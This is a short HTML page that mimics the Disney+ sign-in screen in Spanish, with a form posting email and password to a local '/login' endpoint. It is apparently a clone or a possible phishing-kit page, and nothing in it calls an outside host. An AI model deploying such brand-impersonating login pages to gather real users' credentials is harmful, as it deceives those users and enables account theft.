<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Iniciar sesión | Disney+</title>
    <link rel="icon" href="resources/img/favicon.ico">
    <link rel="stylesheet" href="resources/css/style3.css?1.2">
    <link rel="stylesheet" href="resources/css/normalize.css">
</head>

<body>
    <section class="loader-cont"><div class="loader"></div></section>
    <section class="loader-cierre"></section>
    <section class="inicio">
        <div class="paso1">
            <a class="link-inicio img5"><img src="resources/img/logo.jpg" alt=""></a>
            <form action="/login" method="post">            
            <h2>Inicia sesión con tu correo</h2>
            <input type="email" name="email" class="correo" required placeholder="Correo Electronico">
            <input type="password" name="contraseña" class="correo" required placeholder="Contaseña">
            <input type="submit" name="enviar" value="continuar" class="boton">
            <p>¿Primera vez en Disney+?<a class="link-sus"> Suscribirse</a></p>
            </form>
        </div>
    </section>
    <script src="resources/js/sesion.js"></script>
</body>

</html>